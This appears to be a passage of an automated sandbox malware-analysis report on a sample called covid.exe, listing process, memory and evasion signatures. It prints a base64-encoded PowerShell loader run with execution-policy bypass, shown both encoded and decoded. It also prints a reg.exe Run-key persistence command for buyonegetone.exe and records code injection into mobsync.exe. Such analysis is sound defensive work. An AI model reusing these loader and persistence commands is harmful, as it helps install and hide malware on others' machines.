    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Jump to behavior
    Source: C:\Users\user\Desktop\covid.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4840Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4012Jump to behavior
    Source: C:\Users\user\Desktop\covid.exe TID: 5740Thread sleep time: -922337203685477s >= -30000sJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5996Thread sleep time: -7378697629483816s >= -30000sJump to behavior
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 13_2_00007FF68605D1B8 FindFirstFileExW,13_2_00007FF68605D1B8
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 18_2_00007FF6FE11D1B8 FindFirstFileExW,18_2_00007FF6FE11D1B8
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 29_2_00007FF7E3D7D1B8 FindFirstFileExW,29_2_00007FF7E3D7D1B8
    Source: C:\Users\user\Desktop\covid.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: covid.exe, 00000000.00000002.303793186.0000000001605000.00000004.00000020.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}b8b}w
    Source: powershell.exe, 00000001.00000002.294620272.000001A42B5E0000.00000002.00000001.sdmp, reg.exe, 00000009.00000002.254029548.000001EA21550000.00000002.00000001.sdmp, reg.exe, 0000000A.00000002.256173246.000001DC42C70000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
    Source: powershell.exe, 00000001.00000002.294620272.000001A42B5E0000.00000002.00000001.sdmp, reg.exe, 00000009.00000002.254029548.000001EA21550000.00000002.00000001.sdmp, reg.exe, 0000000A.00000002.256173246.000001DC42C70000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
    Source: powershell.exe, 00000001.00000002.294620272.000001A42B5E0000.00000002.00000001.sdmp, reg.exe, 00000009.00000002.254029548.000001EA21550000.00000002.00000001.sdmp, reg.exe, 0000000A.00000002.256173246.000001DC42C70000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
    Source: mobsync.exe, 0000000F.00000002.320651387.0000023A00CE8000.00000004.00000020.sdmp, mobsync.exe, 00000014.00000002.340229538.0000023F814B8000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
    Source: powershell.exe, 00000001.00000002.294620272.000001A42B5E0000.00000002.00000001.sdmp, reg.exe, 00000009.00000002.254029548.000001EA21550000.00000002.00000001.sdmp, reg.exe, 0000000A.00000002.256173246.000001DC42C70000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 13_2_00007FF686048064 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_00007FF686048064
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 13_2_00007FF68605F470 GetProcessHeap,13_2_00007FF68605F470
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 13_2_00007FF686047CB8 SetUnhandledExceptionFilter,_invalid_parameter_noinfo,13_2_00007FF686047CB8
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 13_2_00007FF686048064 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_00007FF686048064
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 13_2_00007FF686047694 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,13_2_00007FF686047694
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 13_2_00007FF68604FEC8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_00007FF68604FEC8
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 13_2_00007FF686048210 SetUnhandledExceptionFilter,13_2_00007FF686048210
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 18_2_00007FF6FE107CB8 SetUnhandledExceptionFilter,_invalid_parameter_noinfo,18_2_00007FF6FE107CB8
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 18_2_00007FF6FE108064 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,18_2_00007FF6FE108064
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 18_2_00007FF6FE107694 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,18_2_00007FF6FE107694
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 18_2_00007FF6FE10FEC8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,18_2_00007FF6FE10FEC8
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 18_2_00007FF6FE108210 SetUnhandledExceptionFilter,18_2_00007FF6FE108210
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 29_2_00007FF7E3D67CB8 SetUnhandledExceptionFilter,_invalid_parameter_noinfo,29_2_00007FF7E3D67CB8
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 29_2_00007FF7E3D68210 SetUnhandledExceptionFilter,29_2_00007FF7E3D68210
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 29_2_00007FF7E3D68064 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,29_2_00007FF7E3D68064
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 29_2_00007FF7E3D6FEC8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,29_2_00007FF7E3D6FEC8
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 29_2_00007FF7E3D67694 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,29_2_00007FF7E3D67694
    Source: C:\Users\user\Desktop\covid.exeMemory allocated: page read and write | page guardJump to behavior

    HIPS / PFW / Operating System Protection Evasion:

    barindex
    Early bird code injection technique detectedShow sources
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeProcess created / APC Queued / Resumed: C:\Windows\System32\mobsync.exe
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeProcess created / APC Queued / Resumed: C:\Windows\System32\mobsync.exe
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeProcess created / APC Queued / Resumed: C:\Windows\System32\mobsync.exe
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeProcess created / APC Queued / Resumed: C:\Windows\System32\mobsync.exe
    Allocates memory in foreign processesShow sources
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeMemory allocated: C:\Windows\System32\mobsync.exe base: 23A00BA0000 protect: page execute and read and write
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeMemory allocated: C:\Windows\System32\mobsync.exe base: 23F81490000 protect: page execute and read and write
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeMemory allocated: C:\Windows\System32\mobsync.exe base: 1B3CD5A0000 protect: page execute and read and write
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeMemory allocated: C:\Windows\System32\mobsync.exe base: 2212C2E0000 protect: page execute and read and write
    Bypasses PowerShell execution policyShow sources
    Source: C:\Users\user\Desktop\covid.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\system32\windowspowershell\v1.0\powershell.exe' -sta -noprofile -executionpolicy bypass -encodedcommand JAB4AD0AJwA4ADMAOABjADYAMwA5ADcALQBhAGEANgBhAC0ANABjADIAZQAtAGEAZgAxADgALQAwADEAOABjADgAOAAwAGMAMwAzAGIAYgAnADsAJAB5AD0AJwBDADoAXABVAHMAZQByAHMAXABoAGEAcgBkAHoAXABEAGUAcwBrAHQAbwBwAFwAYwBvAHYAaQBkAC4AZQB4AGUAJwA7AHQAcgB5ACAAewANAAoAIAAgAGkAZgAgACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAANAApAA0ACgAgACAAewAgACQAbgB1AGwAbAAgAD0AIABbAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoAVQBuAHMAYQBmAGUATABvAGEAZABGAHIAbwBtACgAJAB5ACkAIAB9ACAAZQBsAHMAZQAgAHsAIAAkAG4AdQBsAGwAIAA9ACAAWwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQARgBpAGwAZQAoACQAeQApAH0ADQAKACAAIAAuACAAKABbAF8AMwAyAC4AXwA4ADgAXQA6ADoAXwA3ADQAKAAkAHgAKQApAA0ACgAgACAAZQB4AGkAdAAgACQATABBAFMAVABFAFgASQBUAEMATwBEAEUADQAKAH0AIAANAAoAYwBhAHQAYwBoACAAWwBOAG8AdABTAHUAcABwAG8AcgB0AGUAZABFAHgAYwBlAHAAdABpAG8AbgBdAA0ACgB7AA0ACgAgACAAVwByAGkAdABlAC0ASABvAHMAdAAgACcAQQBwAHAAbABpAGMAYQB0AGkAbwBuACAAbABvAGMAYQB0AGkAbwBuACAAaQBzACAAdQBuAHQAcgB1AHMAdABlAGQALgAgAEMAbwBwAHkAIABmAGkAbABlACAAdABvACAAYQAgAGwAbwBjAGEAbAAgAGQAcgBpAHYAZQAsACAAYQBuAGQAIAB0AHIAeQAgAGEAZwBhAGkAbgAuACcAIAAtAEYAbwByAGUAZwByAG8AdQBuAGQAQwBvAGwAbwByACAAUgBlAGQADQAKAH0ADQAKAGMAYQB0AGMAaAAgAHsADQAKACAAIABXAHIAaQB0AGUALQBIAG8AcwB0ACAAKAAiAEUAcgByAG8AcgA6ACAAIgAgACsAIAAkAF8ALgBFAHgAYwBlAHAAdABpAG8AbgAuAE0AZQBzAHMAYQBnAGUAKQAgAC0ARgBvAHIAZQAgAFIAZQBkACAADQAKAH0A
    Encrypted powershell cmdline option foundShow sources
    Source: C:\Users\user\Desktop\covid.exeProcess created: Base64 decoded $x='838c6397-aa6a-4c2e-af18-018c880c33bb';$y='C:\Users\hardz\Desktop\covid.exe';try { if ([Environment]::Version.Major -ge 4) { $null = [Reflection.Assembly]::UnsafeLoadFrom($y) } else { $null = [Reflection.Assembly]::LoadFile($y)} . ([_32._88]::_74($x)) exit $LASTEXITCODE} catch [NotSupportedException]{ Write-Host 'Application location is untrusted. Copy file to a local drive, and try again.' -ForegroundColor Red}catch { Write-Host ("Error: " + $_.Exception.Message) -Fore Red }
    Source: C:\Users\user\Desktop\covid.exeProcess created: Base64 decoded $x='838c6397-aa6a-4c2e-af18-018c880c33bb';$y='C:\Users\hardz\Desktop\covid.exe';try { if ([Environment]::Version.Major -ge 4) { $null = [Reflection.Assembly]::UnsafeLoadFrom($y) } else { $null = [Reflection.Assembly]::LoadFile($y)} . ([_32._88]::_74($x)) exit $LASTEXITCODE} catch [NotSupportedException]{ Write-Host 'Application location is untrusted. Copy file to a local drive, and try again.' -ForegroundColor Red}catch { Write-Host ("Error: " + $_.Exception.Message) -Fore Red }Jump to behavior
    Queues an APC in another process (thread injection)Show sources
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeThread APC queued: target process: C:\Windows\System32\mobsync.exe
    Writes to foreign memory regionsShow sources
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeMemory written: C:\Windows\System32\mobsync.exe base: 23A00BA0000
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeMemory written: C:\Windows\System32\mobsync.exe base: 23A00BA0000
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeMemory written: C:\Windows\System32\mobsync.exe base: 23F81490000
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeMemory written: C:\Windows\System32\mobsync.exe base: 23F81490000
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeMemory written: C:\Windows\System32\mobsync.exe base: 1B3CD5A0000
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeMemory written: C:\Windows\System32\mobsync.exe base: 1B3CD5A0000
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeMemory written: C:\Windows\System32\mobsync.exe base: 2212C2E0000
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeMemory written: C:\Windows\System32\mobsync.exe base: 2212C2E0000
    Source: C:\Users\user\Desktop\covid.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\system32\windowspowershell\v1.0\powershell.exe' -sta -noprofile -executionpolicy bypass -encodedcommand JAB4AD0AJwA4ADMAOABjADYAMwA5ADcALQBhAGEANgBhAC0ANABjADIAZQAtAGEAZgAxADgALQAwADEAOABjADgAOAAwAGMAMwAzAGIAYgAnADsAJAB5AD0AJwBDADoAXABVAHMAZQByAHMAXABoAGEAcgBkAHoAXABEAGUAcwBrAHQAbwBwAFwAYwBvAHYAaQBkAC4AZQB4AGUAJwA7AHQAcgB5ACAAewANAAoAIAAgAGkAZgAgACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAANAApAA0ACgAgACAAewAgACQAbgB1AGwAbAAgAD0AIABbAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoAVQBuAHMAYQBmAGUATABvAGEAZABGAHIAbwBtACgAJAB5ACkAIAB9ACAAZQBsAHMAZQAgAHsAIAAkAG4AdQBsAGwAIAA9ACAAWwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQARgBpAGwAZQAoACQAeQApAH0ADQAKACAAIAAuACAAKABbAF8AMwAyAC4AXwA4ADgAXQA6ADoAXwA3ADQAKAAkAHgAKQApAA0ACgAgACAAZQB4AGkAdAAgACQATABBAFMAVABFAFgASQBUAEMATwBEAEUADQAKAH0AIAANAAoAYwBhAHQAYwBoACAAWwBOAG8AdABTAHUAcABwAG8AcgB0AGUAZABFAHgAYwBlAHAAdABpAG8AbgBdAA0ACgB7AA0ACgAgACAAVwByAGkAdABlAC0ASABvAHMAdAAgACcAQQBwAHAAbABpAGMAYQB0AGkAbwBuACAAbABvAGMAYQB0AGkAbwBuACAAaQBzACAAdQBuAHQAcgB1AHMAdABlAGQALgAgAEMAbwBwAHkAIABmAGkAbABlACAAdABvACAAYQAgAGwAbwBjAGEAbAAgAGQAcgBpAHYAZQAsACAAYQBuAGQAIAB0AHIAeQAgAGEAZwBhAGkAbgAuACcAIAAtAEYAbwByAGUAZwByAG8AdQBuAGQAQwBvAGwAbwByACAAUgBlAGQADQAKAH0ADQAKAGMAYQB0AGMAaAAgAHsADQAKACAAIABXAHIAaQB0AGUALQBIAG8AcwB0ACAAKAAiAEUAcgByAG8AcgA6ACAAIgAgACsAIAAkAF8ALgBFAHgAYwBlAHAAdABpAG8AbgAuAE0AZQBzAHMAYQBnAGUAKQAgAC0ARgBvAHIAZQAgAFIAZQBkACAADQAKAH0AJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' https://www.who.int/Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\reg.exe 'C:\Windows\system32\reg.exe' add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v PromoJohn /t REG_SZ /d C:\Users\user\AppData\Roaming\buyonegetone.exe /fJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\reg.exe 'C:\Windows\system32\reg.exe' add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v PromoJohn /t REG_SZ /d C:\Users\user\AppData\Roaming\buyonegetone.exe /fJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\buyonegetone.exe 'C:\Users\user\AppData\Roaming\buyonegetone.exe' Jump to behavior
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeProcess created: C:\Windows\System32\mobsync.exe C:\Windows\System32\mobsync.exe
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeProcess created: C:\Windows\System32\mobsync.exe C:\Windows\System32\mobsync.exe
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeProcess created: C:\Windows\System32\mobsync.exe C:\Windows\System32\mobsync.exe
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeProcess created: C:\Windows\System32\mobsync.exe C:\Windows\System32\mobsync.exe
    Source: C:\Users\user\Desktop\covid.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\system32\windowspowershell\v1.0\powershell.exe' -sta -noprofile -executionpolicy bypass -encodedcommand JAB4AD0AJwA4ADMAOABjADYAMwA5ADcALQBhAGEANgBhAC0ANABjADIAZQAtAGEAZgAxADgALQAwADEAOABjADgAOAAwAGMAMwAzAGIAYgAnADsAJAB5AD0AJwBDADoAXABVAHMAZQByAHMAXABoAGEAcgBkAHoAXABEAGUAcwBrAHQAbwBwAFwAYwBvAHYAaQBkAC4AZQB4AGUAJwA7AHQAcgB5ACAAewANAAoAIAAgAGkAZgAgACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAANAApAA0ACgAgACAAewAgACQAbgB1AGwAbAAgAD0AIABbAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoAVQBuAHMAYQBmAGUATABvAGEAZABGAHIAbwBtACgAJAB5ACkAIAB9ACAAZQBsAHMAZQAgAHsAIAAkAG4AdQBsAGwAIAA9ACAAWwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQARgBpAGwAZQAoACQAeQApAH0ADQAKACAAIAAuACAAKABbAF8AMwAyAC4AXwA4ADgAXQA6ADoAXwA3ADQAKAAkAHgAKQApAA0ACgAgACAAZQB4AGkAdAAgACQATABBAFMAVABFAFgASQBUAEMATwBEAEUADQAKAH0AIAANAAoAYwBhAHQAYwBoACAAWwBOAG8AdABTAHUAcABwAG8AcgB0AGUAZABFAHgAYwBlAHAAdABpAG8AbgBdAA0ACgB7AA0ACgAgACAAVwByAGkAdABlAC0ASABvAHMAdAAgACcAQQBwAHAAbABpAGMAYQB0AGkAbwBuACAAbABvAGMAYQB0AGkAbwBuACAAaQBzACAAdQBuAHQAcgB1AHMAdABlAGQALgAgAEMAbwBwAHkAIABmAGkAbABlACAAdABvACAAYQAgAGwAbwBjAGEAbAAgAGQAcgBpAHYAZQAsACAAYQBuAGQAIAB0AHIAeQAgAGEAZwBhAGkAbgAuACcAIAAtAEYAbwByAGUAZwByAG8AdQBuAGQAQwBvAGwAbwByACAAUgBlAGQADQAKAH0ADQAKAGMAYQB0AGMAaAAgAHsADQAKACAAIABXAHIAaQB0AGUALQBIAG8AcwB0ACAAKAAiAEUAcgByAG8AcgA6ACAAIgAgACsAIAAkAF8ALgBFAHgAYwBlAHAAdABpAG8AbgAuAE0AZQBzAHMAYQBnAGUAKQAgAC0ARgBvAHIAZQAgAFIAZQBkACAADQAKAH0A
